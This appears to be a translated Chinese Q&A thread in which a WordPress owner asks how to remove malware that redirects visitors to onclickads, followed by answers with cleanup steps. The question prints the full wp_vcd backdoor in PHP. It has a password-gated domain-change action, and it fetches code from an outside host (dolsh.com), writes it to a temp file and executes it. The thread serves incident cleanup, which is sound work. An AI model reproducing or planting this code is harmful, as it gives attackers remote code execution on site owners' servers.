代码之家  ›  专栏  ›  技术社区  ›  GravityCode

WordPress网站已将我的链接重定向到onclickads网站

  •  2
  • GravityCode  · 技术社区  · 7 年前

    我不知道这是否是onlickads的代码 每次我点击我网站上的一些链接,它就会在onclickads上重定向我。com链接。

    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
    {
        $div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
        {
            case 'change_domain';
    
            if (isset($_REQUEST['newdomain']))
            {
    
                if (!empty($_REQUEST['newdomain']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                        {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
            default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }
        die("");
    }
    
    if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {  
        $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
        if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
            {
    
                function w1p_te1mp_se1tup($phpCode) {
                    $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
                    $handle = fopen($tmpfname, "w+");
                    fwrite($handle, "<?php\n" . $phpCode);
                    fclose($handle);
                    include $tmpfname;
                    unlink($tmpfname);
                    return get_defined_vars();
                }
                extract(w1p_te1mp_se1tup($tmpcontent));
            }
        }
    }
    
    ?>
    

    任何人都可以建议如何删除我网站上的恶意软件,

    非常感谢。

    4 回复  |  直到 7 年前
        1
  •  4
  •   Fejs Do It    7 年前

    我为解决问题所做的:

    1. 在里面 wp-include wp-vcd.php class.wp.php 文件夹
    2. 目录,打开 post.php 并首先删除 php 标签添加人 Malware
    3. 向主题开放 functions.php 文件,并删除上述代码
        2
  •  3
  •   Gajjar Chintan    7 年前

    可能您不需要安装新版本,您可以通过以下步骤从站点中删除此类注意事项。

    删除onclickads。com重定向,请执行以下步骤:

    2) 从Windows卸载恶意程序

    3) 在你的系统上使用安全软件,也可以在你的WordPress中使用安全插件 Anti-spam Wordfence

    在遵循这些步骤之后,仍然没有任何效果,然后你可以安装一个新版本,并用你的新版本安装安全插件,以避免在将来使用黑客攻击。

        3
  •  0
  •   geshvic    7 年前

    要完全删除代码,如果您使用的是子主题,则必须同时将其从父主题中删除

        4
  •  0
  •   martin schwartz    7 年前

    下面是一个完整详细的解决方案,如何修复我在为我的受攻击网站寻找解决方案后发现的这种恶意软件攻击
    https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution